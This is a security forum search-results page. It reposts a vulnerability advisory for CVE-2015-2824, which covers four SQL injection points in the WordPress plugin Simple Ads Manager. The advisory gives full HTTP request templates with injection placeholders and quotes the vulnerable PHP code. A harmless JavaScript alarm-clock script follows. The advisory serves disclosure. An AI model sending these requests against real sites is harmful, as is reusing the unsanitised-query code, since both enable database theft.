Jump to content

Search the Community

Showing results for tags 'break;'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges
    • Bug Bounty
    • Programare
    • Reverse engineering & exploit development
    • Mobile phones
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Sugestii
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Cumparaturi online's Test
  • Web Development's Forum

Categories

There are no results to display.

There are no results to display.

Blogs

There are no results to display.

There are no results to display.


Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

Found 2 results

  1. #Vulnerability title: Wordpress plugin Simple Ads Manager - Multiple SQL Injection #Product: Wordpress plugin Simple Ads Manager #Vendor: https://profiles.wordpress.org/minimus/ #Affected version: Simple Ads Manager 2.5.94 and 2.5.96 #Download link: https://wordpress.org/plugins/simple-ads-manager/ #CVE ID: CVE-2015-2824 #Author: Le Hong Minh (minh.h.le@itas.vn) & ITAS Team ::PROOF OF CONCEPT:: ---SQL INJECTION 1--- + REQUEST: POST /wp-content/plugins/simple-ads-manager/sam-ajax.php HTTP/1.1 Host: target.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/28.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://target.com/archives/wordpress-plugin-simple-ads-manager/ Content-Length: 270 Cookie: wooTracker=cx5qN1BQ4nmu; _ga=GA1.2.344989027.1425640938; PHPSESSID=kqvtir87g33e2ujkc290l5bmm7; cre_datacookie=8405688a-3dec-4d02-9405-68f53281e991; _gat=1 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache action=sam_hits&hits%5B0%5D%5B%5D=<SQL INJECTION HERE>&hits%5B1%5D%5B%5D=<SQL INJECTION HERE>&hits%5B2%5D%5B%5D=<SQL INJECTION HERE>&level=3 - Vulnerable file: simple-ads-manager/sam-ajax.php - Vulnerable code: case 'sam_ajax_sam_hits': if(isset($_POST['hits']) && is_array($_POST['hits'])) { $hits = $_POST['hits']; $values = ''; $remoteAddr = $_SERVER['REMOTE_ADDR']; foreach($hits as $hit) { $values .= ((empty($values)) ? '' : ', ') . "({$hit[1]}, {$hit[0]}, NOW(), 0, \"{$remoteAddr}\")"; } $sql = "INSERT INTO $sTable (id, pid, event_time, event_type, remote_addr) VALUES {$values};"; $result = $wpdb->query($sql); if($result > 0) echo json_encode(array('success' => true, 'sql' => $sql, 'addr' => $_SERVER['REMOTE_ADDR'])); else echo json_encode(array( 'success' => false, 'result' => $result, 'sql' => $sql, 'hits' => $hits, 'values' => $values )); } break; ---SQL INJECTION 2--- +REQUEST POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1 Host: hostname Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest action=load_posts&cstr=<SQL INJECTION HERE>&sp=Post&spg=Page + Vulnerable file: simple-ads-manager/sam-ajax-admin.php + Vulnerable code: case 'sam_ajax_load_posts': $custs = (isset($_REQUEST['cstr'])) ? $_REQUEST['cstr'] : ''; $sPost = (isset($_REQUEST['sp'])) ? urldecode( $_REQUEST['sp'] ) : 'Post'; $sPage = (isset($_REQUEST['spg'])) ? urldecode( $_REQUEST['spg'] ) : 'Page'; //set @RoW_num + 1 AS recid $sql = "SELECT wp.id, wp.post_title AS title, wp.post_type AS type FROM $postTable wp WHERE wp.post_status = 'publish' AND FIND_IN_SET(wp.post_type, 'post,page{$custs}') ORDER BY wp.id;"; $posts = $wpdb->get_results($sql, ARRAY_A); $k = 0; foreach($posts as &$val) { switch($val['type']) { case 'post': $val['type'] = $sPost; break; case 'page': $val['type'] = $sPage; break; default: $val['type'] = $sPost . ': '.$val['type']; break; } $k++; $val['recid'] = $k; } $out = array( 'status' => 'success', 'total' => count($posts), 'records' => $posts ); break; ---SQL INJECTION 3--- +REQUEST: POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php?searchTerm=<SQL INJECTION HERE> HTTP/1.1 Host: hostname User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: __utma=30068390.891873145.1426646160.1426734944.1427794022.6; __utmz=30068390.1426646160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none) ; wp-settings-1=hidetb%3D1%26libraryContent%3Dbrowse%26imgsize%3Dfull%26align% 3Dcenter%26urlbutton%3Dpost%26editor%3Dtinymce%26mfold%3Do%26advImgDetails%3 Dshow%26ed_size%3D456%26dfw_width%3D822%26wplink%3D1; wp-settings-time-1=1426646255; PHPSESSID=9qrpbn6kh66h4eb102278b3hv5; wordpress_test_cookie=WP+Cookie+check; bp-activity-oldestpage=1; __utmb=30068390.1.10.1427794022; __utmc=30068390 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 22 action=load_combo_data + Vulnerable file: simple-ads-manager/sam-ajax-admin.php +Vulnerable code: from line 225 to 255 case 'sam_ajax_load_combo_data': $page = $_GET['page']; $rows = $_GET['rows']; $searchTerm = $_GET['searchTerm']; $offset = ((int)$page - 1) * (int)$rows; $sql = "SELECT wu.id, wu.display_name AS title, wu.user_nicename AS slug, wu.user_email AS email FROM $uTable wu WHERE wu.user_nicename LIKE '{$searchTerm}%' ORDER BY wu.id LIMIT $offset, $rows;"; $users = $wpdb->get_results($sql, ARRAY_A); $sql = "SELECT COUNT(*) FROM $uTable wu WHERE wu.user_nicename LIKE '{$searchTerm}%';"; $rTotal = $wpdb->get_var($sql); $total = ceil((int)$rTotal/(int)$rows); $out = array( 'page' => $page, 'records' => count($users), 'rows' => $users, 'total' => $total, 'offset' => $offset ); break; ---SQL INJECTION 4--- + REQUEST POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1 Host: hostname User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: __utma=30068390.891873145.1426646160.1426734944.1427794022.6; __utmz=30068390.1426646160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none) ; wp-settings-1=hidetb%3D1%26libraryContent%3Dbrowse%26imgsize%3Dfull%26align% 3Dcenter%26urlbutton%3Dpost%26editor%3Dtinymce%26mfold%3Do%26advImgDetails%3 Dshow%26ed_size%3D456%26dfw_width%3D822%26wplink%3D1; wp-settings-time-1=1426646255; PHPSESSID=9qrpbn6kh66h4eb102278b3hv5; wordpress_test_cookie=WP+Cookie+check; bp-activity-oldestpage=1; __utmc=30068390 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 73 action=load_users&subscriber=<SQL INJECTION HERE>&contributor=<SQL INJECTION HERE>&author=<SQL INJECTION HERE>&editor=<SQL INJECTION HERE>&admin=<SQL INJECTION HERE>&sadmin=<SQL INJECTION HERE> + Vulnerable file: simple-ads-manager/sam-ajax-admin.php + Vulnerable code: from line 188 to 223 case 'sam_ajax_load_users': $roleSubscriber = (isset($_REQUEST['subscriber'])) ? urldecode($_REQUEST['subscriber']) : 'Subscriber'; $roleContributor = (isset($_REQUEST['contributor'])) ? urldecode($_REQUEST['contributor']) : 'Contributor'; $roleAuthor = (isset($_REQUEST['author'])) ? urldecode($_REQUEST['author']) : 'Author'; $roleEditor = (isset($_REQUEST['editor'])) ? urldecode($_REQUEST['editor']) : 'Editor'; $roleAdministrator = (isset($_REQUEST["admin"])) ? urldecode($_REQUEST["admin"]) : 'Administrator'; $roleSuperAdmin = (isset($_REQUEST['sadmin'])) ? urldecode($_REQUEST['sadmin']) : 'Super Admin'; $sql = "SELECT wu.id, wu.display_name AS title, wu.user_nicename AS slug, (CASE wum.meta_value WHEN 0 THEN '$roleSubscriber' WHEN 1 THEN '$roleContributor' WHEN 2 THEN '$roleAuthor' ELSE IF(wum.meta_value > 2 AND wum.meta_value <= 7, '$roleEditor', IF(wum.meta_value > 7 AND wum.meta_value <= 10, '$roleAdministrator', IF(wum.meta_value > 10, '$roleSuperAdmin', NULL) ) ) END) AS role FROM $uTable wu INNER JOIN $umTable wum ON wu.id = wum.user_id AND wum.meta_key = '$userLevel' ORDER BY wu.id;"; $users = $wpdb->get_results($sql, ARRAY_A); $k = 0; foreach($users as &$val) { $k++; $val['recid'] = $k; } $out = $users; break; REFERENCE: + [url]https://www.youtube.com/watch?v=HPJ1r9dhIB4[/url] Best Regards ----------------------------------- ITAS Team ([url]www.itas.vn[/url]) Source
  2. sharkyz

    [JS] Alarma

    Un mic script in js pentru a te avertiza dupa o anumita perioada de timp predefinita de utilizator. // Alarm Clock Mai jos aveti codul sursa care il puteti copia in consola din chrome. // (Ctrl-Shift-C) (function() { (function() { var tim_def = prompt("Timp pana la declansarea alarmei?"); if (tim_def.length === 1) { var tim = tim_def; } else if (tim_def.length > 1) { var tim = tim_def.slice(0,-1); } else { alert ('Raspunsul nu este valid incearca din nou!') } var lctim = tim_def.slice(-1); var audio = new Audio('http://soundjax.com/reddo/97744%5EALARM.mp3'); var alerta = function(smo) { var mes = prompt("Ce ai vrea sa spun alerta ta?", "Alert!"); if (tim_def !== null) { setTimeout(function() { audio.play(); alert(mes ? mes : 'Alarma!'); }, 1000 * smo * parseFloat(tim)); } }; switch (lctim) { case 's': //secunde alerta(1); break; case 'm': //minute alerta(60); break; case 'o': //ore alerta(3600); break; default: alerta(60); break; } })(); })(); In plus puteti face un bookmark cu codul de mai jos: javascript:!function(){!function(){var a=prompt("Timp pana la declansarea alarmei?");if(1===a.length)var e=a;else if(a.length>1)var e=a.slice(0,-1);else alert("Raspunsul nu este valid incearca din nou!");var l=a.slice(-1),n=new Audio("http://soundjax.com/reddo/97744%5EALARM.mp3"),r=function(l){var r=prompt("Ce ai vrea sa spun alerta ta?","Alert!");null!==a&&setTimeout(function(){n.play(),alert(r?r:"Alarma!")},1e3*l*parseFloat(e))};switch(l){case"s":r(1);break;case"m":r(60);break;case"o":r(3600);break;default:r(60)}}()}();
×
×
  • Create New...